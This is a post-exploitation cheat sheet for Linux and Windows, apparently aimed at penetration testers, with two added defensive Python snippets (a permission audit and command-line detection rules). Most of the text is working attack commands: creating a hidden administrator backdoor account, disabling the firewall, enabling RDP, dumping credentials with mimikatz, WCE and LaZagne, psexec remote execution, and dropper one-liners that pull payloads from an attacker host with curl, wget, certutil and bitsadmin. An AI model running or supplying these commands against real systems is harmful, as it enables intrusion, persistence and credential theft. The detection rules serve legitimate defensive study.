Linux Post-exploitation
- Check wrong permissions:
Find setuid binaries:
find / -perm -4000 -ls 2> /dev/null
Find files world writable:
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null
Find directories world writable:
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
Look for interesting files:
find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null
Check sudo:
sudo su
sudo -l
Decrypt PKCS#12 objects:
openssl pkcs12 -info -in $FILE
Show certs in PKCS#7 file:
openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der
Show keystore content:
keytool -list -v -keystore keystore.jks
- Commands for information gathering:
ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu
Find users with shell access:
egrep -e '/bin/(ba)?sh' /etc/passwd
Check bootup services:
ls /etc/rc*
SSH relationships and logins:
cat ~/.ssh/*
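The permission checks and the shell-user check above, reimplemented as an added Python audit (not from the original cheat sheet) that a defender can run over a host and diff against a known-good baseline. demo_findings() builds a constructed temp tree so the code runs offline; root paths and the passwd text are parameters.

```python
import os
import re
import stat
import tempfile

PRUNE = ("/sys", "/proc")  # pseudo-filesystems the find commands above prune

def walk(root, prune=PRUNE):
    """Yield (path, lstat): prunes like find, never follows symlinks, skips unreadable entries."""
    for dirpath, dirnames, filenames in os.walk(root):
        if any(dirpath == p or dirpath.startswith(p + "/") for p in prune):
            dirnames[:] = []
            continue
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path)
            except OSError:
                continue  # the 2>/dev/null of the find commands

def find_setuid(root):
    """Regular files with the setuid bit (find / -perm -4000)."""
    return sorted(p for p, st in walk(root)
                  if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID)

def find_world_writable(root):
    """(files, dirs) writable by 'other' (find ... -type f / -type d -perm -o=w)."""
    hits = [(p, st) for p, st in walk(root) if st.st_mode & stat.S_IWOTH]
    return (sorted(p for p, st in hits if stat.S_ISREG(st.st_mode)),
            sorted(p for p, st in hits if stat.S_ISDIR(st.st_mode)))

def shell_users(passwd_text):
    """Accounts whose login shell is sh or bash (the egrep above, anchored at end)."""
    return [f[0] for f in (line.split(":") for line in passwd_text.splitlines())
            if len(f) == 7 and re.search(r"/bin/(ba)?sh$", f[6])]

def demo_findings():
    """Build a constructed tree in a temp dir and return findings relative to it."""
    root = tempfile.mkdtemp()
    for d in ("bin", "tmp/shared"):
        os.makedirs(os.path.join(root, d))
    for f in ("bin/suid_tool", "bin/normal", "tmp/shared/notes"):
        open(os.path.join(root, f), "w").close()
    os.chmod(os.path.join(root, "bin/suid_tool"), 0o4755)    # setuid bit set
    os.chmod(os.path.join(root, "tmp/shared"), 0o777)        # world-writable dir
    os.chmod(os.path.join(root, "tmp/shared/notes"), 0o666)  # world-writable file
    rel = lambda paths: [os.path.relpath(p, root) for p in paths]
    files, dirs = find_world_writable(root)
    return {"setuid": rel(find_setuid(root)), "ww_files": rel(files), "ww_dirs": rel(dirs)}
```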
References:
Tools:
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- https://github.com/sleventyeleven/Linuxprivchecker
- https://github.com/rebootuser/LinEnum
Windows Post-exploitation
Check filesystem:
Like “ls -la” in Linux:
dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt
Compute MD5 hash:
Get-FileHash -Algorithm MD5 -Path .\$FILE
Check registry:
reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
Check scheduler:
schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt
Other checks:
DRIVERQUERY
wmic os where Primary='TRUE' reboot
List hotfixes:
wmic qfe
notepad myfile.txt:lion.txt
eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts
Wmic commands:
wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get
List SIDs of the system (as admin):
wmic useraccount get name,sid,fullname
Net commands:
net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr
Backdoor account:
net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add
Check routing/network information:
route print
arp -A
ipconfig /all
getmac
Show file attributes / permissions:
cacls cmd.exe
attrib cmd.exe
List services:
sc queryex type= service state= all
net start
Other info:
systeminfo
whoami
Equivalent on Windows XP (which ships without whoami):
echo %USERNAME%
- Firewall
netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Disable firewall:
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
- RDP
Show RDP sessions:
quser
qwinsta
Enable RDP (registry value, firewall exception and service):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
List services on a remote host:
tasklist /svc /S servername /U username /P password
Change RDP daemon status from Meterpreter (more Meterpreter commands in the Metasploit Meterpreter Cheat Sheet):
msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1
Change RDP port:
HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, value PortNumber (REG_DWORD, default 3389)
Remote Execution commands:
wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP
From sysinternals psexec:
psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1
Copy a file to the target host AND execute it:
psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp
Authenticated WMI Exec via Powershell:
msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >
On the same host but under another account:
runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"
Windows exploit suggester (OBSOLETE)
WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Tools for information gathering
Manual method
dir %TMP%
dir %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts
LaZagne
Download LaZagne from https://github.com/AlessandroZ/LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox
RATs (Remote Administration Tools)
- Pupy https://github.com/n1nj4sec/pupy: open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, mainly written in Python
Sniffers
Sniffers for Windows
Install Wireshark, also use in console dumpcap:
dumpcap -D
dumpcap -i $IFACE
Keyloggers for Windows
Windows keylogger (no admin rights):
To cross-compile it for Windows:
i686-w64-mingw32-g++ klog_main.cpp -o klog -static
Network sniffers for Linux
tcpdump -X -s 0 -i $INTERFACE
Password dumping
mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv
Fgdump
Dumps hashes (needs SYSTEM privileges):
fgdump.exe
WCE (Windows Credential Editor)
Dumps clear passwords:
wce -w
Dumps hashes:
wce
Persistent, writes in credentials.txt:
wce -r
Change your credentials in memory:
wce -s
Droppers
Droppers are programs that let you download tools, trojans, etc. to the target machine so the compromise can continue locally.
Droppers using Linux
wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE $USER@$IP:~
Droppers using Windows
Powershell
curl -Uri $URL
See also Powercat in the Powershell frameworks section.
ROBOCOPY
NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
Direct Transfer:
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
Using a download queue:
bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
- https://github.com/LOLBAS-Project/LOLBAS
- https://lolbas-project.github.io/
- https://gtfobins.github.io/
- https://github.com/Arno0x/CSharpScripts
- https://gist.github.com/jstangroome/9adaa87a845e5be906c8
- https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
hh.exe C:\windows\system32\calc.exe
C# compiler built-in command:
csc.exe
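The detection side of the account, firewall, RDP-registry, download and LOLBin commands listed above (net user /add, net localgroup ... /add, netsh advfirewall ... state off, reg add ... fDenyTSConnections, certutil -urlcache, bitsadmin /transfer, hh.exe launching an executable): an added Python example, not from the original page, that runs regex rules over process-creation log lines. The lines are constructed samples in a simplified Image=/CommandLine= format, not real telemetry.

```python
import re

# (rule name, pattern over the command line); each pattern mirrors a command above
RULES = [
    ("local_account_added",
     r"\bnet1?\s+user\s+\S+(\s+\S+)?\s+/add\b"),
    ("added_to_admin_or_rdp_group",
     r'\bnet1?\s+localgroup\s+("?administrators"?|"remote desktop users")\s+\S+\s+/add\b'),
    ("firewall_disabled",
     r"\bnetsh\s+advfirewall\s+set\s+(currentprofile|allprofiles)\s+state\s+off\b"),
    ("rdp_enabled_via_registry",
     r"\breg\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b"),
    ("certutil_download",
     r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b"),
    ("bitsadmin_download",
     r"\bbitsadmin(\.exe)?\s+/(transfer|addfile)\b.*https?://"),
    ("hh_exe_launches_binary",
     r"\bhh(\.exe)?\s+\S+\.exe\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def classify(cmdline):
    """Names of every rule the command line matches (empty list = nothing flagged)."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def scan(log_lines):
    """Parse 'Image=<path> CommandLine=<cmd>' lines; return (image, cmd, hits)
    for each line that triggers at least one rule."""
    findings = []
    for line in log_lines:
        m = re.match(r"Image=(\S+)\s+CommandLine=(.*)$", line.strip())
        if m and (hits := classify(m.group(2))):
            findings.append((m.group(1), m.group(2), hits))
    return findings

# Constructed sample telemetry (not real data); the IP is a documentation address
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\net.exe CommandLine=net user hax0r hax0r /add",
    "Image=C:\\Windows\\System32\\net1.exe CommandLine=net1 localgroup administrators hax0r /add",
    "Image=C:\\Windows\\System32\\netsh.exe CommandLine=netsh advfirewall set allprofiles state off",
    'Image=C:\\Windows\\System32\\reg.exe CommandLine=reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    "Image=C:\\Windows\\System32\\certutil.exe CommandLine=certutil.exe -urlcache -split -f https://203.0.113.5/files/netcat.exe nc.exe",
    "Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe report.txt",
]

if __name__ == "__main__":
    for image, cmd, hits in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", cmd)
```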
Droppers using known protocols
HTTP
Python2
python -m SimpleHTTPServer
python -m SimpleHTTPServer 80
Python3
python3 -m http.server 8080
Php
php -S localhost:8000
Ruby
ruby -run -e httpd . -p 8000
FTP
pip install pyftpdlib
python -m pyftpdlib
SMB
impacket-smbserver PAYLOADS /root/payload
Data exfiltration is also part of the post-exploitation phase.